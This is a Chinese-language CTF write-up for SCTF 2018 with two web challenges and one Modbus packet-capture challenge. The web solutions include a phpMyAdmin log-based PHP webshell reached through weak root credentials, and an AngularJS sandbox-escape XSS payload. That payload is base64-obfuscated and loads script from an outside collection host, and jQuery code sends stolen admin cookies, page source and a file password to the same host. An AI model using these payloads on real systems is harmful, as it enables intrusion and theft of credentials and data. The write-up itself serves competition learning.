_____ _____ _______ ______
/ ____|/ ____|__ __| ____|
| (___ | | | | | |__
\___ \| | | | | __|
____) | |____ | | | |
|_____/ \_____| |_| |_|
__________WEB_____________
0x01 easiest web – phpMyAdmin
思路: 弱口令(root / root)登陆phpmyadmin,利用日志功能进行getshell
送分题,轻松一下 http://47.97.214.247:20001/phpmyadmin Alternate address: http://218.245.4.98:20000/phpmyadmin
开启日志,写入一句话
查询sql语句
eval($_POST['cmd']);?>
日志写入到网站路径下的dasdasdas.php文件
然后就getshell
http://218.245.4.98:20000/dasdasdad.php 密码:cmd 菜刀连接
在C盘发现flag
sctf{31cf2213cc49605a30f07395d6e5b9c4}
0x02 新的建议板
解题思路:从前台发现留言板存在anjularjs的模板注入 ,js中发现api接口,发现需要另外一个管理员账号post带入访问密码才能获取到flag
师傅最近开始学前端 想写个建议板 后来失败了? http://116.62.137.114:4879
Anjularjs的模板注入
Payload:
{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(123)//');}}
用eval(atob("base64"))进行base64加密,绕过过滤
1.1 利用xss获取管理员后台地址
xss平台地址:
http://xsspt.com/aQCIrX?1529652200
使用getScript方法动态加载JS:
$.getScript('http://xsspt.com/aQCIrX?1529652200'); >>base64 >> JC5nZXRTY3JpcHQoJ2h0dHA6Ly94c3NwdC5jb20vYVFDSXJYPzE1Mjk2NTIyMDAnKTsK
eval(atob("JC5nZXRTY3JpcHQoJ2h0dHA6Ly94c3NwdC5jb20vYVFDSXJYPzE1Mjk2NTIyMDAnKTsK"));
在留言板输入下面Payload 可以打到管理员的后台地址和cookie:
{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };eval(atob(\'JC5nZXRTY3JpcHQoJ2h0dHA6Ly94c3NwdC5jb20vYVFDSXJYPzE1Mjk2NTIyMDAnKTsK\'));//');}}
location : http://127.0.0.1:1002/admin/suggest?suggest=%7B%7B'a'.constructor.prototype.charAt=[].join;$eval('x=1%7D%20%7D%20%7D;eval(atob(%5C'JC5nZXRTY3JpcHQoJ2h0dHA6Ly94c3NwdC5jb20vYVFDSXJYPzE1Mjk2NTIyMDAnKTsK%5C'));//');%7D%7D%0D%0A
url解码:
location : http://127.0.0.1:1002/admin/suggest?suggest={{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };eval(atob(\'JC5nZXRTY3JpcHQoJ2h0dHA6Ly94c3NwdC5jb20vYVFDSXJYPzE1Mjk2NTIyMDAnKTsK\'));//');}}
可以发现后台地址在内网http://127.0.0.1:1002/admin/
1.2 利用Jquery获取后台页面源码
首先在xss平台新建模块如下所示:
代码:
$.ajax({
url: "/admin",
type: "GET",
dataType: "text",
success: function(result) {
var code = btoa(encodeURIComponent(result));
xssPost('http://xsspt.com/index.php?do=api&id=aQCIrX', code);
},
error: function(msg) {
}
})
function xssPost(url, postStr) {
var de;
de = document.body.appendChild(document.createElement('iframe'));
de.src = 'about:blank';
de.height = 1;
de.width = 1;
de.contentDocument.write('');
de.contentDocument.forms[0].submit();
de.style.display = 'none';
}
此时获取后台的xss模块已经建立好,需要在原有模块上更新使用模块,默认是使用获取cookie的模块
然后再在留言板上输入payload:
{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };eval(atob(\'JC5nZXRTY3JpcHQoJ2h0dHA6Ly94c3NwdC5jb20vYVFDSXJYPzE1Mjk2NTIyMDAnKTsK\'));//');}}
稍等片刻,即可获取到消息
复制code后面的base64代码:
code: JTNjIURPQ1RZUEUraHRtbCUzZSUwZCUwYSUzY2h0bWwrbGFuZyUzZCUyMnpoLUNOJTIyJTNlJTBkJTBhKyslM2NoZWFkJTNlJTBkJTBhKysrKyUzY21ldGErY2hhcnNldCUzZCUyMnV0Zi04JTIyJTNlJTBkJTBhKysrKyUzY21ldGEraHR0cC1lcXVpdiUzZCUyMlgtVUEtQ29tcGF0aWJsZSUyMitjb250ZW50JTNkJTIySUUlM2RlZGdlJTIyJTNlJTBkJTBhKysrKyUzY21ldGErbmFtZSUzZCUyMnZpZXdwb3J0JTIyK2NvbnRlbnQlM2QlMjJ3aWR0aCUzZGRldmljZS13aWR0aCUyYytpbml0aWFsLXNjYWxlJTNkMSUyMiUzZSUwZCUwYSsrKyslM2MhLS0rJWU0JWI4JThhJWU4JWJmJWIwMyVlNCViOCVhYW1ldGElZTYlYTAlODclZTclYWQlYmUqJWU1JWJmJTg1JWU5JWExJWJiKiVlNiU5NCViZSVlNSU5YyVhOCVlNiU5YyU4MCVlNSU4OSU4ZCVlOSU5ZCVhMiVlZiViYyU4YyVlNCViYiViYiVlNCViZCU5NSVlNSU4NSViNiVlNCViYiU5NiVlNSU4NiU4NSVlNSVhZSViOSVlOSU4MyViZColZTUlYmYlODUlZTklYTElYmIqJWU4JWI3JTlmJWU5JTlhJThmJWU1JTg1JWI2JWU1JTkwJThlJWVmJWJjJTgxKy0tJTNlJTBkJTBhKysrKyUzY21ldGErbmFtZSUzZCUyMmRlc2NyaXB0aW9uJTIyK2NvbnRlbnQlM2QlMjIlMjIlM2UlMGQlMGErKysrJTNjbWV0YStuYW1lJTNkJTIyYXV0aG9yJTIyK2NvbnRlbnQlM2QlMjIlMjIlM2UlMGQlMGErKysrJTNjbGluaytyZWwlM2QlMjJpY29uJTIyK2hyZWYlM2QlMjIlMjIlM2UlMGQlMGElMGQlMGErKysrJTNjdGl0bGUlM2VTWUMlM2MlMmZ0aXRsZSUzZSUwZCUwYSUwZCUwYSUwZCUwYSsrKyslM2NsaW5rK2hyZWYlM2QlMjJodHRwcyUzYSUyZiUyZmNkbi5ib290Y3NzLmNvbSUyZmJvb3RzdHJhcCUyZjMuMy43JTJmY3NzJTJmYm9vdHN0cmFwLm1pbi5jc3MlMjIrcmVsJTNkJTIyc3R5bGVzaGVldCUyMiUzZSUwZCUwYSsrKyslM2NsaW5rK2hyZWYlM2QlMjJjc3MlMmZpZTEwLXZpZXdwb3J0LWJ1Zy13b3JrYXJvdW5kLmNzcyUyMityZWwlM2QlMjJzdHlsZXNoZWV0JTIyJTNlJTBkJTBhKysrKyUzY2xpbmsraHJlZiUzZCUyMmNzcyUyZnN0YXJ0ZXItdGVtcGxhdGUuY3NzJTIyK3JlbCUzZCUyMnN0eWxlc2hlZXQlMjIlM2UlMGQlMGErKysrJTNjc3R5bGUrdHlwZSUzZCUyMnRleHQlMmZjc3MlMjIlM2UlMGQlMGErKysrKysrKysrYm9keSslN2IlMGQlMGErKysrKysrKysrKytwYWRkaW5nLXRvcCUzYSs2MHB4JTNiJTBkJTBhKysrKysrKysrKysrcGFkZGluZy1ib3R0b20lM2ErNDBweCUzYiUwZCUwYSsrKysrKysrKyslN2QlMGQlMGErKysrKysrKyUzYyUyZnN0eWxlJTNlJTBkJTBhJTBkJTBhKysrKyUzY3NjcmlwdCtzcmMlM2QlMjJodHRwcyUzYSUyZiUyZmNkbi5ib290Y3NzLmNvbSUyZmFuZ3VsYXIuanMlMmYxLjQuNiUyZmFuZ3VsYXIubWluLmpzJTIyJTNlJTNjJTJmc2NyaXB0JTNlJTBkJTBhKysrKyUzY3NjcmlwdCtzcmMlM2QlMjJodHRwcyUzYSUyZiUyZmFwcHMuYmRpbWcuY29tJTJmbGlicyUyZmFuZ3VsYXItcm91dGUlMmYxLjMuMTMlMmZhbmd1bGFyLXJvdXRlLmpzJTIyJTNlJTNjJTJmc2NyaXB0JTNlJTBkJTBhKysrKyUzY3NjcmlwdCtzcmMlM2QlMjJqcyUyZmllLWVtdWxhdGlvbi1tb2Rlcy13YXJuaW5nLmpzJTIyJTNlJTNjJTJmc2NyaXB0JTNlJTBkJTBhJTBkJTBhKyslM2MlMmZoZWFkJTNlJTBkJTBhJTBkJTBhKyslM2Nib2R5KyUzZSUwZCUwYSUwZCUwYSsrKyslM2NuYXYrY2xhc3MlM2QlMjJuYXZiYXIrbmF2YmFyLWludmVyc2UrbmF2YmFyLWZpeGVkLXRvcCUyMiUzZSUwZCUwYSsrKysrKyUzY2RpditjbGFzcyUzZCUyMmNvbnRhaW5lciUyMiUzZSUwZCUwYSsrKysrKysrJTNjZGl2K2NsYXNzJTNkJTIybmF2YmFyLWhlYWRlciUyMiUzZSUwZCUwYSsrKysrKysrKyslM2NidXR0b24rdHlwZSUzZCUyMmJ1dHRvbiUyMitjbGFzcyUzZCUyMm5hdmJhci10b2dnbGUrY29sbGFwc2VkJTIyK2RhdGEtdG9nZ2xlJTNkJTIyY29sbGFwc2UlMjIrZGF0YS10YXJnZXQlM2QlMjIlMjNuYXZiYXIlMjIrYXJpYS1leHBhbmRlZCUzZCUyMmZhbHNlJTIyK2FyaWEtY29udHJvbHMlM2QlMjJuYXZiYXIlMjIlM2UlMGQlMGErKysrKysrKysrKyslM2NzcGFuK2NsYXNzJTNkJTIyc3Itb25seSUyMiUzZVRvZ2dsZStuYXZpZ2F0aW9uJTNjJTJmc3BhbiUzZSUwZCUwYSsrKysrKysrKysrKyUzY3NwYW4rY2xhc3MlM2QlMjJpY29uLWJhciUyMiUzZSUzYyUyZnNwYW4lM2UlMGQlMGErKysrKysrKysrKyslM2NzcGFuK2NsYXNzJTNkJTIyaWNvbi1iYXIlMjIlM2UlM2MlMmZzcGFuJTNlJTBkJTBhKysrKysrKysrKysrJTNjc3BhbitjbGFzcyUzZCUyMmljb24tYmFyJTIyJTNlJTNjJTJmc3BhbiUzZSUwZCUwYSsrKysrKysrKyslM2MlMmZidXR0b24lM2UlMGQlMGErKysrKysrKysrJTNjYStjbGFzcyUzZCUyMm5hdmJhci1icmFuZCUyMitocmVmJTNkJTIyJTJmJTIyJTNlU1lDK0FETUlOJTNjJTJmYSUzZSUwZCUwYSsrKysrKysrJTNjJTJmZGl2JTNlJTBkJTBhKysrKysrKyslM2NkaXYraWQlM2QlMjJuYXZiYXIlMjIrY2xhc3MlM2QlMjJjb2xsYXBzZStuYXZiYXItY29sbGFwc2UlMjIlM2UlMGQlMGErKysrKysrKysrJTNjdWwrY2xhc3MlM2QlMjJuYXYrbmF2YmFyLW5hdiUyMiUzZSUwZCUwYSsrKysrKysrKysrKyUzY2xpK2NsYXNzJTNkJTIyYWN0aXZlJTIyJTNlJTNjYStocmVmJTNkJTIyJTIzJTIyJTNlSG9tZSUzYyUyZmElM2UlM2MlMmZsaSUzZSUwZCUwYSsrKysrKysrKysrKyUzY2xpJTNlJTNjYStocmVmJTNkJTIyJTIzJTIyJTNlJWU2JTk3JWE1JWU1JWJmJTk3JTNjJTJmYSUzZSUzYyUyZmxpJTNlJTBkJTBhKysrKysrKysrKysrJTNjbGklM2UlM2NhK2hyZWYlM2QlMjIlMjMlMjIlM2UlZTglYjQlYTYlZTUlOGQlOTUlM2MlMmZhJTNlJTNjJTJmbGklM2UlMGQlMGErKysrKysrKysrKyslM2NsaSUzZSUzY2EraHJlZiUzZCUyMmFkbWluJTJmZmlsZSUyMiUzZSVlNiU5NiU4NyVlNCViYiViNiUzYyUyZmElM2UlM2MlMmZsaSUzZSUwZCUwYSsrKysrKysrKysrKyUzY2xpJTNlJTNjYStocmVmJTNkJTIyYWRtaW4lMmZzdWdnZXN0JTIyJTNlJWU3JTk1JTk5JWU4JWE4JTgwJTNjJTJmYSUzZSUzYyUyZmxpJTNlJTBkJTBhKysrKysrKysrKysrJTNjbGklM2UlM2NhK2hyZWYlM2QlMjIlMjMlMjIlM2UlZTUlOGYlOTElZTUlYjglODMlM2MlMmZhJTNlJTNjJTJmbGklM2UlMGQlMGErKysrKysrKysrJTNjJTJmdWwlM2UlMGQlMGErKysrKysrKyUzYyUyZmRpdiUzZSUwZCUwYSsrKysrKyUzYyUyZmRpdiUzZSUwZCUwYSsrKyslM2MlMmZuYXYlM2UlMGQlMGElMGQlMGElMGQlMGElM2NkaXYrY2xhc3MlM2QlMjJjb250YWluZXIlMjIlM2UlMGQlMGErKyUzY2RpditjbGFzcyUzZCUyMmp1bWJvdHJvbiUyMiUzZSUwZCUwYSsrKysrKysrJTNjaDElM2VIRUxMTythZG1pbkNsb3VuZCUzYyUyZmgxJTNlJTBkJTBhKysrKysrKyslM2NwJTNlJWU2JTk2JWIwJWU3JTg5JTg4JWU1JTkwJThlJWU1JThmJWIwMi4wISUzYyUyZnAlM2UlMGQlMGErKyUzYyUyZmRpdiUzZSUwZCUwYSUzYyUyZmRpdiUzZSUwZCUwYSUwZCUwYSUwZCUwYSsrKyslM2MhLS0rQm9vdHN0cmFwK2NvcmUrSmF2YVNjcmlwdCUwZCUwYSUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCstLSUzZSUwZCUwYSUzYyEtLStQbGFjZWQrYXQrdGhlK2VuZCtvZit0aGUrZG9jdW1lbnQrc28rdGhlK3BhZ2VzK2xvYWQrZmFzdGVyKy0tJTNlJTBkJTBhJTNjc2NyaXB0K3NyYyUzZCUyMmh0dHBzJTNhJTJmJTJmY2RuLmJvb3Rjc3MuY29tJTJmanF1ZXJ5JTJmMS4xMi40JTJmanF1ZXJ5Lm1pbi5qcyUyMiUzZSUzYyUyZnNjcmlwdCUzZSUwZCUwYSUzY3NjcmlwdCtzcmMlM2QlMjJodHRwcyUzYSUyZiUyZmNkbi5ib290Y3NzLmNvbSUyZmJvb3RzdHJhcCUyZjMuMy43JTJmanMlMmZib290c3RyYXAubWluLmpzJTIyJTNlJTNjJTJmc2NyaXB0JTNlJTBkJTBhJTNjIS0tK0lFMTArdmlld3BvcnQraGFjaytmb3IrU3VyZmFjZSUyZmRlc2t0b3ArV2luZG93cys4K2J1ZystLSUzZSUwZCUwYSUzY3NjcmlwdCtzcmMlM2QlMjJqcyUyZmllMTAtdmlld3BvcnQtYnVnLXdvcmthcm91bmQuanMlMjIlM2UlM2MlMmZzY3JpcHQlM2UlMGQlMGElMGQlMGElM2MlMmZib2R5JTNlJTBkJTBhJTNjJTJmaHRtbCUzZSUwZCUwYSUwZCUwYQ==
保存在admin.txt
利用pentestbox进行base64解码
> cat admin.txt |base64 -d
再次进行url解码
解码结果保存在admiin.html
DOCTYPE html>
<html lang="zh-CN">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="description" content="">
<meta name="author" content="">
<link rel="icon" href="">
<title>SYCtitle>
<link href="https://cdn.bootcss.com/bootstrap/3.3.7/css/bootstrap.min.css" rel="stylesheet">
<link href="css/ie10-viewport-bug-workaround.css" rel="stylesheet">
<link href="css/starter-template.css" rel="stylesheet">
<style type="text/css">
body {
padding-top: 60px;
padding-bottom: 40px;
}
style>
<script src="https://cdn.bootcss.com/angular.js/1.4.6/angular.min.js">script>
<script src="https://apps.bdimg.com/libs/angular-route/1.3.13/angular-route.js">script>
<script src="js/ie-emulation-modes-warning.js">script>
head>
<body >
<nav class="navbar navbar-inverse navbar-fixed-top">
<div class="container">
<div class="navbar-header">
<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar" aria-expanded="false" aria-controls="navbar">
<span class="sr-only">Toggle navigationspan>
<span class="icon-bar">span>
<span class="icon-bar">span>
<span class="icon-bar">span>
button>
<a class="navbar-brand" href="/">SYC ADMINa>
div>
<div id="navbar" class="collapse navbar-collapse">
<ul class="nav navbar-nav">
<li class="active"><a href="#">Homea>li>
<li><a href="#">日志a>li>
<li><a href="#">账单a>li>
<li><a href="admin/file">文件a>li>
<li><a href="admin/suggest">留言a>li>
<li><a href="#">发布a>li>
ul>
div>
div>
nav>
<div class="container">
<div class="jumbotron">
<h1>HELLO adminCloundh1>
<p>新版后台2.0!p>
div>
div>
<script src="https://cdn.bootcss.com/jquery/1.12.4/jquery.min.js">script>
<script src="https://cdn.bootcss.com/bootstrap/3.3.7/js/bootstrap.min.js">script>
<script src="js/ie10-viewport-bug-workaround.js">script>
body>
html>
发现管理员账号: adminClound
1.3 利用js api接口,找到文件密码
在一开始的首页里有个 min-test.js
,这里泄露了admin模板文件view/admintest2313.html
,在这个模板中发现一个备忘录的接口
替换成管理员账号,访问 http://116.62.137.114:4879/api/memos/adminClound
得到文件访问密码
拿到文件密码后,构造包访问 /admin/file页面和上面获取admin页面一样
DOCTYPE html>
<html lang="zh-CN">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="description" content="">
<meta name="author" content="">
<link rel="icon" href="">
<title>SYCtitle>
<link href="https://cdn.bootcss.com/bootstrap/3.3.7/css/bootstrap.min.css" rel="stylesheet">
<link href="css/ie10-viewport-bug-workaround.css" rel="stylesheet">
<link href="css/starter-template.css" rel="stylesheet">
<style type="text/css">
body {
padding-top: 60px;
padding-bottom: 40px;
}
style>
<script src="https://cdn.bootcss.com/angular.js/1.4.6/angular.min.js">script>
<script src="https://apps.bdimg.com/libs/angular-route/1.3.13/angular-route.js">script>
<script src="js/ie-emulation-modes-warning.js">script>
head>
<body >
<nav class="navbar navbar-inverse navbar-fixed-top">
<div class="container">
<div class="navbar-header">
<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar" aria-expanded="false" aria-controls="navbar">
<span class="sr-only">Toggle navigationspan>
<span class="icon-bar">span>
<span class="icon-bar">span>
<span class="icon-bar">span>
button>
<a class="navbar-brand" href="/">SYC ADMINa>
div>
<div id="navbar" class="collapse navbar-collapse">
<ul class="nav navbar-nav">
<li class="active"><a href="#">Homea>li>
<li><a href="#">日志a>li>
<li><a href="#">账单a>li>
<li><a href="admin/file">文件a>li>
<li><a href="admin/suggest">留言a>li>
<li><a href="#">发布a>li>
ul>
div>
div>
nav>
<div class="container">
<form method="post">
<label for="filePasswd" class="sr-only">输入文件密码label>
<input type="text" id="filePasswd" class="form-control" placeholder="filepasswd" required="" autofocus="" name="filepasswd">
<button class="btn btn-lg btn-primary btn-block" type="submit">提交button>
form>
div>
<script src="https://cdn.bootcss.com/jquery/1.12.4/jquery.min.js">script>
<script src="https://cdn.bootcss.com/bootstrap/3.3.7/js/bootstrap.min.js">script>
<script src="js/ie10-viewport-bug-workaround.js">script>
body>
html>
1.4 输入文件密码,获取flag
同样需要在xss平台设置模块,并引用该模块
$.ajax({ url: "/admin/file", type: "POST", dataType: "text", data: "filepasswd=HGf^%2639NsslUIf^23", success: function(result) { var code = btoa(encodeURIComponent(result)); xssPost('http://xsspt.com/index.php?do=api&id=aQCIrX', code); }, error: function(msg) { } }) function xssPost(url, postStr) { var de; de = document.body.appendChild(document.createElement('iframe')); de.src = 'about:blank'; de.height = 1; de.width = 1; de.contentDocument.write(''); de.contentDocument.forms[0].submit(); de.style.display = 'none'; }
留言板再次提交payload
{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };eval(atob(\'JC5nZXRTY3JpcHQoJ2h0dHA6Ly94c3NwdC5jb20vYVFDSXJYPzE1Mjk2NTIyMDAnKTsK\'));//');}}
稍等片刻即可,查看xss平台
code : c2N0ZiU3QlQ0aXNfaXNfZjFhZzIzMTMlN0Q=
base64解码后再url解码
sctf{T4is_is_f1ag2313}
________________MiSC ________________
0x03 神奇的Modbus
思路:根据题目Modbus,只要过滤Modbus协议,跟随tcp流就可以找到flag
寻找flag
附件: http://sctf2018.xctf.org.cn/media/task/c7348d96-947d-48ef-a91d-2b3eb647d9a9.zip
下载附件,解压,用wireshark分析
过滤之前:
过滤之后:
跟随第一个tcp 流
找到flag
sctf{Easy_Mdbus}
提交答案发现不对
尝试加个o,提交正确
sctf{Easy_Modbus}